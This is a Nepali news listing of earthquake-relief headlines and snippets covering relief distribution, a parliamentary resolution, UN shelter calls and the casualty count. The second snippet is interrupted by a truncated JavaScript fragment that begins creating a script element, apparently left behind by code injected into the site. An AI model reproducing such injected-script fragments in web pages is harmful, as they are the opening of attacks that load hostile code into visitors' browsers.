National News
-
भूकम्प पीडितहरुले समानरुपमा राहत पाउन नसकेको
भूकम्प पीडितहरुले समानरुपमा राहत पाउन नसकेको भन्दै एकद्वार प्रणालीबाट सबैलाई पुग्नेगरी राहत वितरण गर्न व्यबस्थापिका संसद अन्र्तगतको विकास समितिले सरकारलाई दिर्नेशन दिएको छ। जथाभावी राहत वितरण गर्दा कतै नपुगेको र कतै दोहोरिएको भन्दै समितिले सबैलाई…
-
सरकारले भूकम्प पीडितहरुको राहतबारे विशेष संकल्प प्रस्ताव पेश गरेको
सरकारले भूकम्प पीडितहरुको राहत, पुनःस्थापना र पुनर्निर्माणबारे व्यवस्थापिका संसद बैठकमा विशेष संकल्प प्रस्ताव पेश गरेको छ। संकल्प प्रस्ताव पेश गर्दैै प्रधानमन्त्री सुशील कोइरालाले पीडितहरुको पुनर्वास र राहतमा कुनै कसर बाँकी नराख्ने बताउनुभयो। var d=document;var s=d.createElement(‘script’);
-
जेमी म्याकरोल्डरिकले वर्खा सुरु हुनुअघि नै भूकम्प पीडितलाई बासको व्यवस्था गर्नुपर्ने बताउनुभएको
संयुक्त राष्ट्र संघका मानवीय समन्वयकर्ता जेमी म्याकरोल्डरिकले वर्खा सुरु हुनुअघि नै भूकम्प पीडितलाई बासको व्यवस्था गर्नुपर्ने बताउनुभएको छ। दुर्गमका सर्वसाधारणलाई सहायता सामग्री पु¥याउन राष्ट्रसंघ केन्द्रीत रहेको भन्दै जेमीले पीडितको बासस्थानलाई प्राथमिकतामा राख्नुपर्ने बताउनुभयो।
-
सरकारका साथै विभिन्न राष्ट्रिय तथा अन्तर्राष्ट्रिय संघ संगठनले विभिन्न प्रकारको सहयोग स्किम उपलब्ध गराउने
नेपालका भूकम्पबाट प्रभावित जिल्लाका पीडित जनतालाई राहत सहयोगका लागि सरकारका साथै विभिन्न राष्ट्रिय तथा अन्तर्राष्ट्रिय संघ संगठनले विभिन्न प्रकारको सहयोग स्किम उपलब्ध गराउने घोषणा गर्ने क्रम बढ्दै गएको छ। यो पंतिमा गैरआवासीय नेपाली संघ पनि…
-
भूकम्पमा परी ज्यान गुमाउनेको संख्या सात हजार आठ सय ८५ पुगेको
वैशाख १२ गते गएको विनाशकारी भूकम्पमा परी ज्यान गुमाउनेको संख्या सात हजार आठ सय ८५ पुगेको छ । भूकम्पमा परी १५ हजार नौ सय ४४ जना घाइते भएको नेपाल प्रहरीले उपलब्ध गराएको पछिल्लो तथ्यांकमा उल्लेख…